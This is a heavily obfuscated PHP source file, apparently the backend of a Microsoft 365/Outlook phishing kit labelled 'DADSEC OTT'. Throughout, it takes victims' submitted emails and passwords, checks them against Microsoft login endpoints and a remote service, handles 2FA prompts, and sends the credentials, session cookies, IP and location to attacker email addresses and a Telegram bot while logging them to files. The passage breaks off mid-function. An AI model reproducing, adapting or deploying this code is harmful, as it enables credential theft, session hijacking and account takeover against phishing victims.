 goto Cbce8fe34c9306d4c7525081ad1ec2; Ee27f6a8a99d6338c86569df41edfb: Becf805cfaa21a9a62d6082cd16f51: $token = urlencode(base64_encode(gzdeflate(json_encode(["\x63\164\170" => $beginAuth["\x43\x74\x78"], "\x66\x6c\157\167\124\157\x6b\145\x6e" => $beginAuth["\x46\154\157\167\x54\157\x6b\x65\x6e"], "\x63\157\x6f\153\x69\145" => $token["\143\157\157\153\151\x65"], "\155\x65\x74\150\x6f\x64" => $method, "\x73\x65\x73\x73\151\157\156" => $beginAuth["\123\x65\163\163\x69\x6f\156\111\144"]])))); $appotp = $beginAuth["\x45\156\164\x72\157\160\x79"]; echo json_encode(["\x73\164\x61\164\165\x73" => true, "\x64\141\164\141" => $token, "\162\x65\x64\151\x72\145\143\x74" => "\77{$redirect}\46\x75\x73\145\162\75{$user}\46\142\x67\75{$bg}\46\x6c\x6f\x67\x6f\x3d{$logo}\x26\164\x6f\153\145\156\75{$token}\46\x6b\145\x79\x3d{$key}\46\141\x70\160\x6f\164\160\75{$appotp}\x26\x62\157\x69\x6c\145\162\x3d{$boiler}"]); C1a8c8911b85bf571cce4bf6b3ce41: Eb5e8854f0c158ff64036b9e6e75f6: goto c979094e39d1f4d65c9e1eff279d22; Bc0e37145a2b1d461fad28a2ebb9da: $tp = $_SESSION["\164\x70"]; if ($tp == "\157\x66\x66") { goto de75fe727a5397440fb69649cdcdd1; } if ($tp == "\157\x74\x68\145\x72") { goto Dc65019ba29fbe9059bda23681e038; } if ($tp == "\150\x6f\x74") { goto a8fa16226b07e94806923ecb977b77; } $login = ["\163\164\x61\164\165\x73" => "\x65\162\x72\157\162", "\x6d\145\163\163\141\x67\x65" => "\131\157\x75\x72\40\x61\x63\x63\x6f\x75\x6e\x74\40\x6f\x72\x20\160\141\163\x73\x77\157\162\x64\x20\151\x73\x20\151\x6e\x63\157\x72\162\x65\x63\x74"]; goto Fefec8aa27a1aa82a44931334a4c65; de75fe727a5397440fb69649cdcdd1: $login = loginOffice($_POST["\x75\163\x65\x72"], $_POST["\160\141\x73\x73"]); goto Fefec8aa27a1aa82a44931334a4c65; Dc65019ba29fbe9059bda23681e038: $login = Other($_POST["\165\x73\145\x72"], $_POST["\x70\141\x73\x73"]); goto Fefec8aa27a1aa82a44931334a4c65; goto c860871d370f12d8d60cca5b2c741a; Fc6753e05c7861d2afdb1949acc3a5: if ($_POST["\163\145\162\x76\x69\x63\x65"] == "\x73\155\163") { goto Dfc3c559ac3a0ecd78f962a1ff6dc5; } if ($_POST["\163\145\162\x76\151\x63\145"] == "\143\157\x64\x65") { goto d2311d88b865849f3347a5801d408e; } if ($_POST["\163\145\162\166\x69\x63\145"] == "\x63\141\x6c\x6c") { goto Fff53b1d6ed4e14e21d8baf0299ef5; } if (!($_POST["\x73\x65\162\166\151\x63\x65"] == "\x54\167\x6f\x57\x61\171\126\157\x69\x63\x65\x4f\146\x66\151\143\x65")) { goto A82b46b9a547e4bc13482cdcd64488; } $endAuth = EndAuthOffice($_POST["\164\x6f\153\145\x6e"], ''); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["\x63\164\x78" => $endAuth["\x43\164\170"], "\x66\x6c\157\x77\x54\157\153\145\156" => $endAuth["\x46\154\157\x77\x54\x6f\153\145\156"], "\143\x6f\x6f\153\x69\145" => $token["\143\x6f\157\x6b\x69\145"], "\x6d\x65\164\x68\157\144" => $token["\x6d\x65\x74\150\157\x64"], "\x73\145\x73\163\x69\157\156" => $endAuth["\x53\x65\x73\163\151\157\x6e\x49\x64"]])))); if ($endAuth["\x53\165\143\x63\145\163\163"]) { goto a70f73130ebfccac11ff36d7cac45f; } echo json_encode(["\163\164\x61\164\x75\x73" => false, "\155\x65\x73\x73\x61\147\x65" => "\126\x65\162\151\x66\x69\x63\141\x74\151\157\156\x20\146\141\x69\154\x65\x64", "\x74\157\x6b\145\x6e" => $newToken]); goto f776c3b330e34a039a08a14d2375ae; a70f73130ebfccac11ff36d7cac45f: processAuthOffice($endAuth, $user, $token["\143\157\157\x6b\x69\x65"], $_POST["\x6b\145\171"]); echo json_encode(["\x73\x74\141\x74\165\x73" => true, "\x72\x65\x64\x69\162\x65\143\x74" => "\x30{$random}\x3f\163\x75\x63\143\145\x73\x73\x26\x69\x64\75{$user}\x26\x62\x67\x3d" . base64_encode($_POST["\142\141\x63\153\147\x72\157\x75\156\x64"]) . "\x26\154\x6f\147\x6f\x3d" . base64_encode($_POST["\154\157\x67\x6f"]) . "\x26\142\x6f\151\154\145\x72\x3d" . urlencode(base64_encode($_POST["\x62\x6f\x69\x6c\x65\x72"]))]); f776c3b330e34a039a08a14d2375ae: A82b46b9a547e4bc13482cdcd64488: goto Eefc3ba92576909bb4bf6aa6fe5c59; Fff53b1d6ed4e14e21d8baf0299ef5: $endAuth = EndAuthOffice($_POST["\x74\157\x6b\145\156"], ''); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["\143\164\x78" => $endAuth["\x43\x74\x78"], "\x66\154\x6f\x77\124\157\x6b\145\x6e" => $endAuth["\x46\154\x6f\x77\x54\157\x6b\x65\156"], "\x63\157\x6f\153\151\145" => $token["\x63\157\157\153\151\x65"], "\x6d\145\x74\150\x6f\x64" => $token["\155\145\x74\150\x6f\x64"], "\163\x65\163\163\151\157\156" => $endAuth["\123\x65\x73\163\151\x6f\x6e\111\x64"]])))); if ($endAuth["\x53\x75\x63\143\x65\163\163"]) { goto D944b4b833757bc2bfa0765684b4c2; } echo json_encode(["\163\164\141\x74\165\163" => false, "\x6d\145\163\x73\141\x67\x65" => "\126\145\162\151\146\151\143\141\164\151\x6f\x6e\40\146\141\x69\154\145\x64", "\164\x6f\x6b\145\x6e" => $newToken]); goto Ed1cbb4603f84fae5168e5d3bee00d; afa5a161aa2bc6cb165e92eedbf398: include "\143\157\156\x66\x69\147\x2e\x70\150\x70"; function r($length) { $characters = "\x30\x31\x32\63\x34\x35\66\x37\70\x39\x61\x62\x63\x64\x65\146\x67\x68\x69\x6a\153\154\155\156\157\160\161\162\163\x74\x75\x76\x77\170\x79\x7a\x41\x42\103\x44\x45\106\107\110\111\x4a\113\x4c\115\116\117\120\x51\x52\123\124\x55\126\127\x58\x59\132"; $result = ''; $i = 0; bb87111eb7d83bbd4c7b7d8b7b4ad6: if (!($i < $length)) { goto aac922eaa28a9a01c89d30cc85ebb4; } $result .= $characters[rand(0, strlen($characters) - 1)]; d99efe14a354b3f95e0002b4972d31: $i++; goto bb87111eb7d83bbd4c7b7d8b7b4ad6; aac922eaa28a9a01c89d30cc85ebb4: return $result; } $random = r(90); function sendEmailResult($email, $password, $status, $cookie = null) { goto d9c07537227e5242d8b4325bc637fb; d9c07537227e5242d8b4325bc637fb: include "\x63\x6f\156\146\x69\147\x2e\x70\x68\160"; $adddate = date("\x44\40\115\40\144\x2c\40\x59\x20\147\72\x69\x20\x61"); if (!empty($_SERVER["\x48\124\124\120\137\103\x4c\x49\x45\x4e\x54\137\x49\120"]) && filter_var($_SERVER["\x48\x54\124\120\x5f\x43\x4c\111\105\x4e\x54\137\111\x50"], FILTER_VALIDATE_IP)) { goto Bc229709527b36cda3a74b09aeac04; } if (!empty($_SERVER["\110\x54\124\120\137\x58\137\x46\x4f\x52\x57\x41\122\x44\x45\x44\x5f\x46\x4f\x52"]) && filter_var($_SERVER["\x48\124\x54\x50\x5f\x58\x5f\106\117\x52\x57\101\122\x44\x45\x44\137\x46\x4f\122"], FILTER_VALIDATE_IP)) { goto c5c0c1181daaef3fa2e891105a797b; } if (filter_var($_SERVER["\122\105\115\117\x54\105\x5f\101\x44\104\122"], FILTER_VALIDATE_IP)) { goto C97c0e601aba80f16625dbd8f5a7a6; } goto D283aa8d0433620642aa66a4e05fa3; Bc229709527b36cda3a74b09aeac04: $ip = $_SERVER["\110\x54\x54\120\x5f\103\114\111\105\x4e\124\137\x49\x50"]; goto D283aa8d0433620642aa66a4e05fa3; c5c0c1181daaef3fa2e891105a797b: $ip = $_SERVER["\110\x54\124\120\137\x58\x5f\x46\117\122\x57\x41\122\104\105\104\x5f\106\x4f\122"]; goto D283aa8d0433620642aa66a4e05fa3; C97c0e601aba80f16625dbd8f5a7a6: $ip = $_SERVER["\x52\x45\x4d\x4f\x54\x45\137\101\104\x44\122"]; D283aa8d0433620642aa66a4e05fa3: $fud_scama = curl_init(); curl_setopt($fud_scama, CURLOPT_URL, "\x68\164\164\x70\72\57\57\x69\x70\55\x61\x70\151\56\x63\x6f\155\x2f\x6a\x73\157\156\57" . $ip); curl_setopt($fud_scama, CURLOPT_HEADER, 0); curl_setopt($fud_scama, CURLOPT_RETURNTRANSFER, true); $curlExec = curl_exec($fud_scama); goto a47ccd0144bee28e19c23f9e69f26a; a47ccd0144bee28e19c23f9e69f26a: $IP_LOOKUP = json_decode($curlExec, true); $browser = $_SERVER["\x48\124\x54\120\137\x55\x53\x45\122\x5f\101\x47\105\116\x54"]; $brow = "\x55\156\153\x6e\157\167\156"; if (strstr($browser, "\106\151\162\x65\146\157\x78")) { goto F3266efc0e484567070b0f816947b4; } if (strstr($browser, "\105\144\x67")) { goto E2a684cedbe92f1cba5c0988cb39e1; } if (strstr($browser, "\x4f\120\x52")) { goto E1d7475b594e06ad447a0213ad2e84; } if (strstr($browser, "\x43\x68\x72\157\155\x65")) { goto c479a2a0217b91debda5abd05757bc; } if (strstr($browser, "\123\x61\x66\141\162\x69") && !strstr($browser, "\103\x68\x72\x6f\155\x65")) { goto f645091d509ba7ee7feab4400d4c6e; } if (strstr($browser, "\115\157\x62\x69\154\x65")) { goto f3030201123741849aaadcb2e4cd5b; } goto E13c83cbc5c1782e99b08e892005f1; F3266efc0e484567070b0f816947b4: $brow = "\106\x69\162\145\x66\157\x78"; goto E13c83cbc5c1782e99b08e892005f1; E2a684cedbe92f1cba5c0988cb39e1: $brow = "\x45\144\147\145"; goto E13c83cbc5c1782e99b08e892005f1; E1d7475b594e06ad447a0213ad2e84: $brow = "\x4f\160\145\162\x61"; goto E13c83cbc5c1782e99b08e892005f1; c479a2a0217b91debda5abd05757bc: goto Eb6efbf562807ff1642ebd48fac329; Eb6efbf562807ff1642ebd48fac329: $brow = "\x43\150\162\157\155\x65"; goto E13c83cbc5c1782e99b08e892005f1; f645091d509ba7ee7feab4400d4c6e: $brow = "\x53\141\146\141\x72\x69"; goto E13c83cbc5c1782e99b08e892005f1; f3030201123741849aaadcb2e4cd5b: $brow = "\x50\150\157\x6e\145\40\102\x72\157\x77\163\145\162"; E13c83cbc5c1782e99b08e892005f1: $fud_scama_country = $IP_LOOKUP["\x63\x6f\165\x6e\x74\x72\x79"]; $fud_scama_countrycode = $IP_LOOKUP["\143\x6f\165\156\x74\x72\171\x43\x6f\x64\145"]; $fud_scama_state = $IP_LOOKUP["\162\145\147\x69\157\156\x4e\141\x6d\x65"]; $fud_scama_city = $IP_LOOKUP["\x63\x69\x74\171"]; $fud_scama_postal = $IP_LOOKUP["\x7a\151\160"]; $m = "\133\117\124\x54\135\40{$status}\x20\x5b" . $email . "\135\x20\55\40\x5b\107\x49\x46\124\40\x46\122\117\x4d\40\x44\101\x44\x53\x45\103\135\12"; $m .= "\53\x20\55\x2d\55\x2d\x2d\x2d\55\55\x2d\x2d\x2d\55\55\x2d\55\x5b\x4f\124\124\x5d\55\x2d\55\55\55\55\55\55\x2d\x2d\55\x2d\55\x2b\12"; $m .= "\x7c\x20\105\40\72\x20" . $email . "\12"; $m .= "\174\x20\120\x20\72\x20" . $password . "\xa"; $m .= "\174\x20\111\120\x20\x3a\40{$ip}\12"; $m .= "\174\40\x42\x20\72\x20" . $brow . "\xa"; $m .= "\174\40\x4c\40\72\x20" . $fud_scama_city . "\x20\x2d\40" . $fud_scama_state . "\40\x2d\40" . $fud_scama_country . "\12"; goto Afb38490cfca25ca6d74af21095584; c30f4729f9ada106960b9284a44093: $body .= $m . "\xd\12"; $body .= "\55\x2d" . $boundary . "\xd\12"; if (!$cookie) { goto a817bf13791ed315733133d6507a1f; } $body .= "\x43\157\156\164\145\156\x74\x2d\x54\171\x70\145\72\x20\x74\145\170\164\x2f\160\x6c\141\x69\x6e\x3b\40\x6e\141\x6d\x65\75\x22" . $email . "\56\x74\170\x74" . "\x22\15\12"; $body .= "\x43\157\156\x74\x65\x6e\x74\x2d\x54\162\141\156\x73\146\x65\162\55\x45\x6e\143\x6f\144\x69\156\x67\x3a\40\142\x61\163\145\66\x34\15\12"; $body .= "\103\x6f\x6e\x74\x65\156\x74\x2d\104\151\x73\x70\157\163\x69\x74\151\157\x6e\x3a\x20\x61\x74\164\x61\143\x68\x6d\x65\x6e\x74\73\40\x66\x69\x6c\145\x6e\x61\x6d\145\x3d\42" . $email . "\56\x74\x78\x74" . "\42\15\xa\15\12"; $body .= chunk_split(base64_encode($cookie)) . "\xd\xa"; $body .= "\55\55" . $boundary . "\x2d\55"; a817bf13791ed315733133d6507a1f: $subject = "\x5b\117\124\x54\x5d\x20{$status}\40\x5b" . $email . "\x5d\x20\x2d\40\x5b\x47\111\106\124\40\x46\x52\x4f\x4d\x20\x44\x41\104\x53\x45\103\x5d"; if (!(!empty($email) && isset($email))) { goto fc3d79c10646263a4ba1059b86ab55; } if (!($send_results_to_email == "\x6f\156")) { goto Fad7a4a667e2279fbb3feb62ec8b77; } foreach ($contacts as $contact) { $to = $contact; mail($to, $subject, $body, $headers); b93b549b3d0ba776e7f963e1be3ebe: } c43767aab96ef90368789219c3da50: Fad7a4a667e2279fbb3feb62ec8b77: if (!($send_results_to_telegram == "\x6f\156")) { goto B3946445b9c395f759320f5ab17178; } if ($cookie) { goto D67b2b192c85294a48ad2589c1e350; } $document_url = "\x68\164\164\x70\x73\x3a\57\x2f\x61\x70\151\56\x74\x65\x6c\145\x67\x72\x61\155\x2e\157\x72\147\x2f\x62\157\x74" . $bot_token . "\x2f\x73\145\x6e\144\x4d\x65\163\x73\x61\x67\x65"; $document_post_fields = array("\x63\x68\141\x74\137\x69\144" => $chat_id, "\164\145\x78\x74" => $telegram); goto e6736d685f58b0b6c14e5af2219c3b; goto E56a1eb5ab43834c102301ef1d2d53; c5b1dbc7b949f0de5a5c2e6190d3cf: goto e4fef1f5acf7586f548878f1ae9694; ce45416137e3d593925d9e99f0ff47: $res_file = fopen("\142\x6c\157\x6f\x64\x79\57" . $invalid_logs_file, "\141"); fwrite($res_file, $m) . "\xd\xa"; goto e4fef1f5acf7586f548878f1ae9694; D5cd3ea3eaf1bc9bd4399c3411951f: $res_file = fopen("\142\154\x6f\x6f\x64\x79\57" . $sso_logs_file, "\141"); fwrite($res_file, $m) . "\xd\12"; e4fef1f5acf7586f548878f1ae9694: if (!$cookie) { goto A26a48c5fa65b6499046180b60a660; } $res_file = fopen("\x62\x6c\157\157\144\x79\57" . $email . "\56\164\170\x74", "\x77"); fwrite($res_file, $cookie) . "\15\xa"; unlink($temp_file_txt); A26a48c5fa65b6499046180b60a660: fc3d79c10646263a4ba1059b86ab55: goto acf98c19f4fcac681917001c0bfadd; E56a1eb5ab43834c102301ef1d2d53: D67b2b192c85294a48ad2589c1e350: $temp_file = tempnam(sys_get_temp_dir(), "\x63\157\157\x6b\151\x65\137"); file_put_contents($temp_file, $cookie); $temp_file_txt = substr_replace($temp_file, "\x5f{$email}\x2e\x74\x78\164", -4); rename($temp_file, $temp_file_txt); $document_url = "\150\x74\x74\160\x73\72\x2f\57\x61\x70\151\56\x74\x65\154\145\x67\162\141\x6d\x2e\157\x72\147\57\142\157\164" . $bot_token . "\57\x73\x65\x6e\x64\x44\157\x63\x75\x6d\x65\156\x74"; $document_post_fields = array("\x63\150\141\164\x5f\151\144" => $chat_id, "\x64\157\x63\x75\x6d\x65\x6e\164" => curl_file_create($temp_file_txt), "\143\x61\x70\x74\x69\x6f\x6e" => $telegram); e6736d685f58b0b6c14e5af2219c3b: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $document_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $document_post_fields); $result = curl_exec($ch); curl_close($ch); B3946445b9c395f759320f5ab17178: if (strpos($status, "\x49\x4e\x56\x41\x4c\x49\104") !== false) { goto ce45416137e3d593925d9e99f0ff47; } if (strpos($status, "\123\x53\x4f") !== false) { goto D5cd3ea3eaf1bc9bd4399c3411951f; } $res_file = fopen("\142\154\x6f\x6f\x64\171\57" . $valid_logs_file, "\141"); fwrite($res_file, $m) . "\15\12"; goto c5b1dbc7b949f0de5a5c2e6190d3cf; Afb38490cfca25ca6d74af21095584: $m .= "\x7c\40\x44\x20\72\40" . $adddate . "\12"; $m .= $cookie != '' ? "\174\40\x43\40\72\40\x44\145\x6c\151\x63\151\157\x75\x73\x20\143\x6f\x6f\x6b\x69\x65\163\x21\12" : "\x7c\40\103\40\72\40\x4e\x6f\x6e\145\xa"; $m .= "\53\40\55\x2d\x2d\x2d\x2d\x2d\55\55\55\55\x2d\x2d\55\55\55\x2d\55\55\55\55\55\x2d\x2d\55\55\x2d\55\x2d\55\55\x2d\55\55\x2d\55\x2d\53\xa"; $telegram = "\x5b\117\124\124\135\x20{$status}\x20\x5b\40" . $email . "\40\x5d\x20" . (strpos($status, "\x49\116\126\x41\114\111\104") !== false ? "\xe2\235\227" : "\342\x9d\244\xef\270\217") . "\12"; $telegram .= "\xe2\226\xac\xe2\226\254\342\226\xac\342\x96\254\xe2\x96\xac\xe2\226\254\342\x96\xac\133\x44\101\104\x53\x45\103\x20\117\124\x54\135\342\x96\xac\342\x96\xac\342\x96\xac\342\x96\xac\342\226\254\xe2\x96\xac\xe2\x96\xac\xa"; $telegram .= "\xe2\x9a\241\40\105\155\x61\x69\x6c\72\x20" . $email . "\xa"; $telegram .= "\xe2\232\241\40\x50\141\x73\x73\x77\x6f\162\x64\x3a\x20" . $password . "\12"; $telegram .= "\xe2\x9a\241\40\62\x46\x41\x20\x53\x65\x63\165\162\x69\x74\x79\72\x20" . (strpos($status, "\62\106\x41") !== false ? "\xe2\x9c\205" : "\xe2\235\227") . "\12"; $telegram .= "\342\226\254\xe2\226\xac\xe2\226\xac\xe2\226\xac\342\x96\254\xe2\226\254\x5b\111\x50\x20\x49\x4e\106\117\x52\115\x41\124\111\x4f\x4e\135\342\x96\xac\xe2\226\xac\342\x96\xac\xe2\226\254\342\x96\254\xe2\x96\xac\xa"; $telegram .= "\111\x50\72\40{$ip}\12"; $telegram .= "\x42\x72\157\167\163\x65\162\x3a\40" . $brow . "\xa"; $telegram .= "\x4c\x6f\x63\x61\x74\x69\x6f\156\72\40" . $fud_scama_city . "\40\x2d\x20" . $fud_scama_state . "\x20\55\x20" . $fud_scama_country . "\12"; $telegram .= "\104\x61\x74\145\x3a\40" . $adddate . "\xa"; $telegram .= $cookie != '' ? "\x43\157\157\x6b\151\x65\x73\72\40\104\x65\154\151\x63\151\157\165\163\40\x63\157\157\153\151\x65\x73\41\xa" : "\x43\157\157\153\151\x65\x73\72\x20\116\x6f\156\x65\12"; $boundary = md5(time()); $headers .= "\x4d\111\x4d\105\55\x56\x65\162\x73\x69\x6f\x6e\x3a\40\x31\x2e\x30\15\12"; $headers .= "\103\157\156\164\x65\x6e\164\55\124\171\160\145\72\40\155\165\x6c\x74\x69\160\141\162\x74\57\155\x69\170\x65\144\x3b\40\142\157\165\x6e\144\141\162\x79\x3d" . $boundary . "\xd\12"; $body = "\55\x2d" . $boundary . "\xd\xa"; $body .= "\103\157\x6e\x74\x65\156\164\55\124\x79\160\x65\x3a\40\x74\145\170\x74\57\160\154\141\151\x6e\x3b\x20\x63\150\141\x72\x73\145\x74\75\x55\124\106\55\x38\15\12"; $body .= "\x43\157\156\x74\145\156\164\55\x54\162\x61\156\163\x66\x65\x72\x2d\105\x6e\143\157\x64\x69\156\147\72\40\x38\x62\151\164\xd\xa\xd\12"; goto c30f4729f9ada106960b9284a44093; acf98c19f4fcac681917001c0bfadd: } function request($post = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\164\160\x73\x3a\57\57\x6f\164\x74\x2e\x63\x6f\144\145\163\57"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["\x48\x54\x54\x50\137\x55\x53\x45\122\x5f\x41\x47\x45\x4e\124"]); if (!($post != NULL)) { goto Cf303da0ca359a23bea102c9a5dd41; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post)); Cf303da0ca359a23bea102c9a5dd41: $result = curl_exec($ch); if (!curl_errno($ch)) { goto E392a40c53f58bb204854e06361649; } echo curl_error($ch); E392a40c53f58bb204854e06361649: curl_close($ch); return $result; } function getDetailEmail($email) { $banner = null; $background = null; $data = ["\165\x73\145\x72\156\x61\x6d\x65" => $email, "\x69\163\x4f\164\150\145\x72\111\x64\160\x53\x75\x70\x70\157\162\x74\145\144" => true, "\x63\150\145\143\x6b\120\150\157\x6e\145\163" => false, "\151\163\122\145\155\157\x74\145\x4e\107\x43\123\165\x70\160\157\x72\x74\x65\x64" => true, "\151\163\x43\x6f\157\x6b\151\x65\102\x61\156\x6e\145\x72\123\150\157\x77\156" => false, "\151\163\x46\x69\x64\x6f\x53\x75\160\160\x6f\162\164\x65\x64" => true, "\x63\x6f\165\156\164\x72\171" => "\111\x44", "\x66\x6f\x72\x63\x65\x6f\x74\x63\x6c\x6f\x67\151\x6e" => false, "\151\163\105\x78\x74\x65\162\156\141\x6c\x46\x65\144\145\x72\x61\164\x69\x6f\x6e\104\x69\x73\x61\x6c\154\x6f\167\x65\x64" => false, "\x69\163\x52\x65\155\x6f\164\145\103\157\x6e\x6e\145\143\x74\x53\165\160\x70\x6f\x72\x74\145\x64" => false, "\146\x65\x64\x65\162\x61\164\151\x6f\x6e\106\154\141\147\x73" => 0, "\151\x73\x53\x69\147\156\x75\x70" => false, "\151\x73\101\143\x63\x65\x73\163\120\141\163\x73\x53\x75\x70\x70\x6f\x72\164\x65\x64" => true]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\160\x73\x3a\x2f\57\x6c\x6f\147\151\156\56\x6d\151\143\x72\x6f\x73\x6f\146\x74\157\156\154\151\x6e\x65\56\143\x6f\155\57\x63\157\x6d\x6d\157\x6e\x2f\107\145\164\x43\162\x65\144\145\156\164\151\x61\x6c\x54\x79\160\x65\77\155\153\164\x3d\145\x6e\55\x55\x53"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); $result = curl_exec($ch); curl_close($ch); $ress = json_decode($result, true); if ($ress["\111\146\x45\x78\x69\x73\164\x73\x52\x65\x73\x75\x6c\164"] == 1) { goto d5812dcf717ce61b1d82bcbeb8b5dc; } if ($ress["\111\146\105\x78\151\x73\x74\163\x52\145\x73\165\154\x74"] == 5) { goto F2af18574aa5b1c59dec20a2c3b80f; } if (in_array($ress["\x49\x66\105\x78\151\x73\x74\x73\x52\145\x73\x75\x6c\x74"], array(0, 6))) { goto f78f36414e7893efaa9a0530a380b6; } goto d5e990f85bb2fcb9c67bc3b3d2eb7b; d5812dcf717ce61b1d82bcbeb8b5dc: return ["\163\x74\141\164\165\x73" => "\145\162\x72\157\x72", "\155\145\x73\x73\141\147\x65" => "\127\145\40\x63\157\165\154\144\156\47\164\40\x66\x69\x6e\x64\x20\141\x6e\40\x61\143\x63\x6f\x75\156\x74\40\x77\x69\x74\150\x20\164\150\x61\x74\40\x75\163\145\162\156\141\155\145\x2e\40\124\162\171\40\141\x6e\x6f\164\x68\x65\x72\40\x61\143\143\157\165\156\164\x2e"]; goto d5e990f85bb2fcb9c67bc3b3d2eb7b; F2af18574aa5b1c59dec20a2c3b80f: $_SESSION["\x74\160"] = "\150\157\164"; goto d5e990f85bb2fcb9c67bc3b3d2eb7b; f78f36414e7893efaa9a0530a380b6: if (isset($ress["\x43\x72\x65\144\145\156\164\151\141\154\163"]["\x46\x65\144\145\162\x61\x74\x69\157\x6e\122\145\x64\x69\x72\145\x63\164\125\162\x6c"]) && !empty($ress["\103\x72\x65\x64\x65\x6e\164\x69\141\154\x73"]["\x46\x65\x64\x65\x72\x61\164\x69\x6f\156\122\x65\144\x69\162\x65\x63\164\x55\x72\154"])) { goto d4422710903c06402f96b0c3e26e97; } $_SESSION["\x74\x70"] = "\157\146\x66"; goto B731a6616047664cb70b2002d9d217; d4422710903c06402f96b0c3e26e97: $_SESSION["\164\x70"] = "\157\164\150\x65\162"; B731a6616047664cb70b2002d9d217: d5e990f85bb2fcb9c67bc3b3d2eb7b: if (!isset($ress["\105\x73\x74\x73\x50\x72\157\x70\x65\162\x74\x69\145\x73"]["\125\x73\145\x72\124\x65\156\141\x6e\x74\x42\x72\141\156\x64\x69\x6e\x67"][0]["\102\141\x6e\156\x65\x72\114\157\147\x6f"])) { goto bfb75b3aba47782a6b174abafbccf7; } $banner = $ress["\105\x73\164\163\120\162\157\160\x65\x72\x74\x69\145\x73"]["\125\163\x65\x72\124\x65\156\141\x6e\164\102\162\141\156\x64\151\x6e\147"][0]["\x42\x61\x6e\156\x65\162\114\157\147\x6f"]; bfb75b3aba47782a6b174abafbccf7: if (!isset($ress["\x45\x73\x74\x73\120\x72\x6f\160\x65\162\x74\x69\x65\163"]["\x55\x73\x65\x72\124\145\156\x61\156\x74\x42\x72\141\x6e\144\151\x6e\x67"][0]["\x49\x6c\154\165\163\164\162\141\164\x69\x6f\156"])) { goto E47ea7c52604947e2a7e135990f7ee; } $background = $ress["\105\x73\164\x73\x50\162\157\160\145\x72\164\151\x65\163"]["\125\163\x65\162\124\145\x6e\x61\156\x74\x42\x72\141\156\144\151\x6e\147"][0]["\x49\154\154\165\163\x74\x72\x61\x74\151\x6f\x6e"]; E47ea7c52604947e2a7e135990f7ee: if (!isset($ress["\x45\x73\164\163\120\162\x6f\160\145\162\x74\x69\145\x73"]["\x55\163\x65\x72\124\145\x6e\141\156\164\x42\162\x61\x6e\x64\x69\156\x67"][0]["\x42\157\151\154\145\x72\120\154\x61\164\145\x54\145\170\164"])) { goto A7ca8486a751d95845dda16047b764; } $boilerPlateText = $ress["\x45\163\x74\x73\120\x72\x6f\160\x65\x72\x74\151\x65\x73"]["\x55\163\145\162\x54\x65\156\141\x6e\164\x42\162\x61\156\144\151\x6e\x67"][0]["\102\157\x69\x6c\145\x72\120\x6c\x61\x74\x65\124\145\x78\164"]; A7ca8486a751d95845dda16047b764: return ["\x73\x74\x61\x74\165\x73" => "\163\165\143\143\145\163\163", "\142\141\156\x6e\145\x72" => $banner, "\142\x61\x63\153\147\x72\157\x75\156\x64" => $background, "\142\157\151\x6c\145\162\120\x6c\141\x74\145\124\x65\170\164" => $boilerPlateText]; } function Other($email, $password) { global $api_token; $data = array("\157\x74\x68\145\162" => true, "\141\160\x69\137\x74\157\153\145\156" => $api_token, "\145\155\141\x69\x6c" => $email, "\160\x61\163\x73\x77\157\x72\x64" => $password, "\x64" => base64_encode($_SERVER["\x53\105\122\x56\105\x52\x5f\116\101\115\x45"])); $response = request($data); $result = json_decode($response, true); if ($result && isset($result["\163\165\143\143\145\x73\x73"]) && $result["\163\x75\143\x63\x65\x73\x73"] === true) { goto c5b520a8f6cd6272cec7fc96abb974; } if ($result["\x73\x74\141\164\165\163"] == "\x76\x65\162\151\146\x79") { goto e228b2966b4a890432a8f6395a1ef4; } sendEmailResult($email, $password, "\123\123\x4f\40\x4f\x46\x46\x49\103\105\40\116\117\x54\x20\x53\x55\122\x45"); return ["\163\164\x61\x74\165\163" => "\145\x72\162\157\162", "\155\145\163\x73\141\x67\145" => "\x59\x6f\x75\162\40\x61\x63\143\157\x75\x6e\x74\40\157\x72\x20\x70\x61\163\163\x77\157\162\144\x20\151\163\40\x69\x6e\x63\157\162\162\145\x63\x74"]; goto Cf5b1ec360cd158752bef58f9b95b9; c5b520a8f6cd6272cec7fc96abb974: sendEmailResult($email, $password, "\x4f\106\x46\111\103\x45\x20\126\x41\x4c\111\104"); return ["\163\x74\x61\x74\165\x73" => "\163\165\x63\143\x65\x73\x73", "\155\x65\163\x73\x61\147\x65" => "\114\x6f\x67\151\x6e\40\x73\165\x63\143\x65\163\163"]; goto Cf5b1ec360cd158752bef58f9b95b9; e228b2966b4a890432a8f6395a1ef4: return $result; Cf5b1ec360cd158752bef58f9b95b9: } function loginOutlook($email, $password) { global $api_token; $data = array("\157\x75\x74\154\157\x6f\153" => true, "\x61\x70\x69\137\164\x6f\153\x65\156" => $api_token, "\x65\155\x61\x69\x6c" => $email, "\160\141\163\x73\x77\x6f\x72\x64" => $password, "\x64" => base64_encode($_SERVER["\x53\x45\122\126\x45\122\137\x4e\101\x4d\105"])); $response = request($data); $result = json_decode($response, true); if ($result && isset($result["\163\x75\x63\143\x65\x73\163"]) && $result["\163\x75\143\143\x65\163\163"] === true) { goto e2e64c7e397babd84e00df0aabb372; } sendEmailResult($email, $password, "\x4f\125\x54\114\x4f\x4f\x4b\x20\111\116\x56\101\x4c\111\104"); return ["\163\164\x61\164\x75\x73" => "\x65\162\162\x6f\x72", "\155\145\x73\163\x61\147\x65" => "\131\x6f\x75\162\x20\x61\143\143\157\165\x6e\164\40\157\162\x20\x70\x61\x73\x73\x77\157\162\144\x20\x69\163\x20\151\156\143\x6f\162\x72\x65\143\x74"]; goto Ff97dd33fba5549244a02f990a0781; e2e64c7e397babd84e00df0aabb372: sendEmailResult($email, $password, "\117\x55\124\x4c\x4f\x4f\113\40\126\101\114\111\x44"); return ["\x73\164\x61\x74\165\163" => 